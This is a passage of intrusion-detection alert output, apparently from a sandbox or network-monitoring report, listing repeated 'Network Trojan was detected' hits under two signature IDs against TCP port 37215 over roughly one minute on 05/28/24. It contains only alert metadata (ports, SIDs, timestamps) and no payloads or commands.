          SID:2835222
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.617177
          SID:2835222
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739355
          SID:2835222
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191797
          SID:2829579
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328598
          SID:2835222
          Source Port:51242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411925
          SID:2835222
          Source Port:54206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767051
          SID:2829579
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075111
          SID:2835222
          Source Port:37940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241024
          SID:2829579
          Source Port:48978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553632
          SID:2835222
          Source Port:46134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229797
          SID:2835222
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147335
          SID:2835222
          Source Port:59086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102962
          SID:2829579
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711034
          SID:2829579
          Source Port:46066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332693
          SID:2829579
          Source Port:40972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175980
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939635
          SID:2835222
          Source Port:59394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051195
          SID:2835222
          Source Port:48316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324191
          SID:2829579
          Source Port:35492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399648
          SID:2835222
          Source Port:44798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553084
          SID:2835222
          Source Port:40434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943363
          SID:2835222
          Source Port:49010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486639
          SID:2829579
          Source Port:55132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195326
          SID:2835222
          Source Port:39442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760078
          SID:2835222
          Source Port:58558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084354
          SID:2829579
          Source Port:40844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272669
          SID:2835222
          Source Port:60034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246969
          SID:2835222
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767913
          SID:2835222
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711410
          SID:2835222
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838696
          SID:2835222
          Source Port:48494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272449
          SID:2829579
          Source Port:55210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464077
          SID:2835222
          Source Port:54444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874078
          SID:2835222
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272890
          SID:2835222
          Source Port:34292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561083
          SID:2835222
          Source Port:52180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164951
          SID:2829579
          Source Port:54856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665350
          SID:2829579
          Source Port:51674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822609
          SID:2829579
          Source Port:34112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847571
          SID:2835222
          Source Port:48322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724589
          SID:2835222
          Source Port:35878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669276
          SID:2829579
          Source Port:51354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923689
          SID:2829579
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271012
          SID:2829579
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710651
          SID:2835222
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958814
          SID:2829579
          Source Port:43396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476778
          SID:2835222
          Source Port:56072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465394
          SID:2829579
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207027
          SID:2835222
          Source Port:33518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.129880
          SID:2835222
          Source Port:43154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987515
          SID:2829579
          Source Port:34104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921338
          SID:2829579
          Source Port:53436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738521
          SID:2835222
          Source Port:33484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206956
          SID:2829579
          Source Port:55682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553100
          SID:2835222
          Source Port:51052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008837
          SID:2835222
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177219
          SID:2829579
          Source Port:48028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271929
          SID:2829579
          Source Port:34898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369574
          SID:2829579
          Source Port:60178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.172230
          SID:2835222
          Source Port:34828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267787
          SID:2829579
          Source Port:33692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628790
          SID:2829579
          Source Port:60620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663225
          SID:2829579
          Source Port:49338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922618
          SID:2829579
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627821
          SID:2835222
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473459
          SID:2835222
          Source Port:58668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356220
          SID:2829579
          Source Port:33292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664971
          SID:2829579
          Source Port:57718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480435
          SID:2835222
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735452
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336479
          SID:2835222
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559761
          SID:2829579
          Source Port:52656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042283
          SID:2829579
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594622
          SID:2829579
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328033
          SID:2829579
          Source Port:37552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601990
          SID:2835222
          Source Port:46456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486831
          SID:2829579
          Source Port:46780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208066
          SID:2835222
          Source Port:40864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358927
          SID:2835222
          Source Port:41546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729092
          SID:2835222
          Source Port:60830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938040
          SID:2835222
          Source Port:36976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689232
          SID:2829579
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114155
          SID:2835222
          Source Port:40842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677736
          SID:2835222
          Source Port:34854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841321
          SID:2829579
          Source Port:33828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117170
          SID:2835222
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341791
          SID:2829579
          Source Port:59566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.270967
          SID:2835222
          Source Port:52526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464229
          SID:2835222
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657042
          SID:2829579
          Source Port:46068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156303
          SID:2835222
          Source Port:56860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709051
          SID:2835222
          Source Port:45406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891681
          SID:2829579
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216723
          SID:2835222
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861530
          SID:2835222
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145169
          SID:2829579
          Source Port:42762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810441
          SID:2829579
          Source Port:35614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622166
          SID:2835222
          Source Port:33380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709001
          SID:2829579
          Source Port:52384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855658
          SID:2829579
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190746
          SID:2829579
          Source Port:34702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597692
          SID:2835222
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422578
          SID:2835222
          Source Port:52314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667790
          SID:2835222
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721792
          SID:2835222
          Source Port:40120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226007
          SID:2835222
          Source Port:39324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178415
          SID:2829579
          Source Port:47404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941507
          SID:2835222
          Source Port:50856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175641
          SID:2829579
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213757
          SID:2835222
          Source Port:47992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084885
          SID:2835222
          Source Port:38466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861413
          SID:2835222
          Source Port:58932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920194
          SID:2829579
          Source Port:60384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689317
          SID:2829579
          Source Port:37382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885737
          SID:2835222
          Source Port:37546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000759
          SID:2829579
          Source Port:55232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438956
          SID:2829579
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922546
          SID:2829579
          Source Port:44786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709223
          SID:2829579
          Source Port:35660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922803
          SID:2835222
          Source Port:49242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065148
          SID:2829579
          Source Port:57472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105742
          SID:2829579
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185617
          SID:2829579
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105982
          SID:2835222
          Source Port:35282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914072
          SID:2835222
          Source Port:55576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953220
          SID:2835222
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464414
          SID:2829579
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591250
          SID:2835222
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.484140
          SID:2835222
          Source Port:55694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156190
          SID:2835222
          Source Port:35908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486784
          SID:2835222
          Source Port:35258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114203
          SID:2835222
          Source Port:49094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486506
          SID:2829579
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156196
          SID:2835222
          Source Port:39030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797164
          SID:2835222
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048693
          SID:2835222
          Source Port:41372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201940
          SID:2835222
          Source Port:44540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497950
          SID:2829579
          Source Port:51904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992291
          SID:2835222
          Source Port:52380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695779
          SID:2829579
          Source Port:50458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186548
          SID:2835222
          Source Port:36344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325877
          SID:2829579
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352807
          SID:2829579
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435462
          SID:2835222
          Source Port:45600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167606
          SID:2835222
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152184
          SID:2835222
          Source Port:50934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239958
          SID:2835222
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664142
          SID:2835222
          Source Port:56086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216561
          SID:2829579
          Source Port:46712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932650
          SID:2829579
          Source Port:45440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593096
          SID:2829579
          Source Port:58490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926657
          SID:2829579
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039593
          SID:2829579
          Source Port:52406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217770
          SID:2835222
          Source Port:52262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942299
          SID:2829579
          Source Port:36634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593330
          SID:2835222
          Source Port:59362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722026
          SID:2829579
          Source Port:56682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868690
          SID:2835222
          Source Port:48240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332321
          SID:2829579
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273166
          SID:2835222
          Source Port:38592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838583
          SID:2835222
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797180
          SID:2829579
          Source Port:60896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226001
          SID:2835222
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496724
          SID:2829579
          Source Port:45424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332191
          SID:2835222
          Source Port:50846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767965
          SID:2835222
          Source Port:48106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290406
          SID:2829579
          Source Port:45926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225860
          SID:2829579
          Source Port:57146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550369
          SID:2829579
          Source Port:40908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142515
          SID:2829579
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543331
          SID:2835222
          Source Port:51060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215198
          SID:2835222
          Source Port:58206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889993
          SID:2835222
          Source Port:49356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953035
          SID:2829579
          Source Port:43124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.990499
          SID:2829579
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710231
          SID:2829579
          Source Port:40212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070446
          SID:2829579
          Source Port:58738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316928
          SID:2829579
          Source Port:44290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324141
          SID:2829579
          Source Port:53144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235793
          SID:2835222
          Source Port:51928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299975
          SID:2829579
          Source Port:32894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530055
          SID:2829579
          Source Port:38820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.794508
          SID:2835222
          Source Port:55294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712054
          SID:2835222
          Source Port:38658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105505
          SID:2835222
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636836
          SID:2835222
          Source Port:41868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233122
          SID:2829579
          Source Port:48982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466134
          SID:2835222
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272731
          SID:2835222
          Source Port:47432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325804
          SID:2829579
          Source Port:46766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892675
          SID:2829579
          Source Port:57988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415941
          SID:2835222
          Source Port:51678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.599990
          SID:2835222
          Source Port:58238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.089723
          SID:2835222
          Source Port:40980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543588
          SID:2829579
          Source Port:55384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271175
          SID:2835222
          Source Port:41340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913358
          SID:2835222
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066631
          SID:2829579
          Source Port:35554
          Destination Port:37215
